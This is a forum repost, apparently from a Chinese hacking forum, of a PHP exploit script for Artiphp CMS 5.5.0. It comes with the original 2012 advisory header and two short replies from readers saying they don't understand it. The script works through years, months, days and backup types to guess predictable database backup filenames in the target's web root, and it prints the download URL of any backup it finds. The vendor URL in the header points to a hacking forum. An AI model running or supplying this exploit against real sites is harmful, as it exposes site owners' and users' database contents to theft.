Artiphp CMS 5.5.0 Database Backup Disclosure Exploit

Free_小东

1. <?php  
   
2. 
   
3.    
   
4. 
   
5. /*  
   
6. 
   
7.    
   
8. 
   
9. Artiphp CMS 5.5.0 Database Backup Disclosure Exploit  
   
10. 
    
11.    
    
12. 
    
13.    
    
14. 
    
15. Vendor: Artiphp  
    
16. 
    
17. Product web page: http://www.ihonker.org
    
18. Affected version: 5.5.0 Neo (r422)  
    
19. 
    
20.    
    
21. 
    
22. Summary: Artiphp is a content management system (CMS) open  
    
23. 
    
24. and free to create and manage your website.  
    
25. 
    
26.    
    
27. 
    
28. Desc: Artiphp stores database backups using backupDB() utility  
    
29. 
    
30. with a predictable file name inside the web root, which can be  
    
31. 
    
32. exploited to disclose sensitive information by downloading the  
    
33. 
    
34. file. The backup is located in '/artzone/artpublic/database/'  
    
35. 
    
36. directory as 'db_backup_[type].[yyyy-mm-dd].sql.gz' filename.  
    
37. 
    
38.    
    
39. 
    
40. Tested on: Microsoft Windows XP Professional SP3 (EN)  
    
41. 
    
42.            Apache 2.2.21  
    
43. 
    
44.            PHP 5.3.8 / 5.3.9  
    
45. 
    
46.            MySQL 5.5.20  
    
47. 
    
48.    
    
49. 
    
50.    
    
51. 
    
52. Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
    
53. 
    
54.                             @zeroscience  
    
55. 
    
56.    
    
57. 
    
58.    
    
59. 
    
60. Advisory ID: ZSL-2012-5091  
    
61. 
    
62. Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5091.php  
    
63. 
    
64.    
    
65. 
    
66.    
    
67. 
    
68. 15.05.2012  
    
69. 
    
70.    
    
71. 
    
72. */  
    
73. 
    
74.    
    
75. 
    
76. error_reporting(0);  
    
77. 
    
78.    
    
79. 
    
80. print "\no==========================================================o\n";  
    
81. 
    
82. print "|                                                          |";  
    
83. 
    
84. print "\n|\tArtiphp CMS 5.5.0 DB Backup Disclosure Exploit     |\n";  
    
85. 
    
86. print "|                                                          |\n";  
    
87. 
    
88. print "|\t\t\tby LiquidWorm                      |\n";  
    
89. 
    
90. print "|                                                          |";  
    
91. 
    
92. print "\no==========================================================o\n";  
    
93. 
    
94.    
    
95. 
    
96. if ($argc < 3)  
    
97. 
    
98. {  
    
99. 
    
100.     print "\n\n\x20[*] Usage: php $argv[0] <host> <port>\n\n\n";  
     
101. 
     
102.     die();  
     
103. 
     
104. }  
     
105. 
     
106.    
     
107. 
     
108. $godina_array = array('2012','2011','2010');  
     
109. 
     
110.    
     
111. 
     
112. $mesec_array = array('12','11','10','09',  
     
113. 
     
114.              '08','07','06','05',  
     
115. 
     
116.              '04','03','02','01');  
     
117. 
     
118.    
     
119. 
     
120. $dn_array = array('31','30','29','28','27','26',  
     
121. 
     
122.           '25','24','23','22','21','20',  
     
123. 
     
124.           '19','18','17','16','15','14',  
     
125. 
     
126.           '13','12','11','10','09','08',  
     
127. 
     
128.           '07','06','05','04','03','02',  
     
129. 
     
130.           '01');  
     
131. 
     
132.    
     
133. 
     
134. $backup_array = array('full','structure','partial');  
     
135. 
     
136.    
     
137. 
     
138. $host = $argv[1];  
     
139. 
     
140. $port = intval($argv[2]);  
     
141. 
     
142. $path = "/artiphp/artzone/artpublic/database/"; // change per need.  
     
143. 
     
144.    
     
145. 
     
146. $alert1 = "\033[0;31m";  
     
147. 
     
148. $alert2 = "\033[0;37m";  
     
149. 
     
150.    
     
151. 
     
152. foreach($godina_array as $godina)  
     
153. 
     
154. {  
     
155. 
     
156.     print "\n\n\x20[*] Checking year: ".$godina."\n\n Scanning: ";  
     
157. 
     
158.     sleep(2);  
     
159. 
     
160.     foreach($mesec_array as $mesec)  
     
161. 
     
162.     {  
     
163. 
     
164.         foreach($dn_array as $dn)  
     
165. 
     
166.         {  
     
167. 
     
168.             print "~";  
     
169. 
     
170.             foreach($backup_array as $backup)  
     
171. 
     
172.             {  
     
173. 
     
174.                 if(file_get_contents("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz"))  
     
175. 
     
176.                 {  
     
177. 
     
178.                     print "\n\n\x20[!] DB backup file discovered!\n\n";  
     
179. 
     
180.                     echo $alert1;  
     
181. 
     
182.                     print "\x20==>\x20";  
     
183. 
     
184.                     echo $alert2;  
     
185. 
     
186.                     die("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz\n");  
     
187. 
     
188.                 }  
     
189. 
     
190.             }  
     
191. 
     
192.         }  
     
193. 
     
194.     }  
     
195. 
     
196. }  
     
197. 
     
198.    
     
199. 
     
200. print "\n\n\x20[*] Zero findings.\n\n\n"  
     
201. 
     
202.    
     
203. 
     
204. ?>
     

复制代码

N.O

看不懂的路过

k红颜

看不懂